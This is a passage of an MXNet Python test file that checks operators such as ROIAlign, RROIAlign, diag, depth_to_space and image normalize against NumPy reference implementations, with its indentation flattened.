TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
@with_seed()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
@with_seed()
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
# k = -1 axis1=1, axis3=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@with_seed()
@pytest.mark.serial
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@with_seed()
@pytest.mark.serial
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
@with_seed()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
@with_seed()
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
@with_seed()
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
@with_seed()
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
@with_seed()
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
@with_seed()
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
@with_seed()
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@with_seed()
@pytest.mark.serial
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@with_seed()
@pytest.mark.serial
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
@with_seed()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
@with_seed()
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
@with_seed()
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
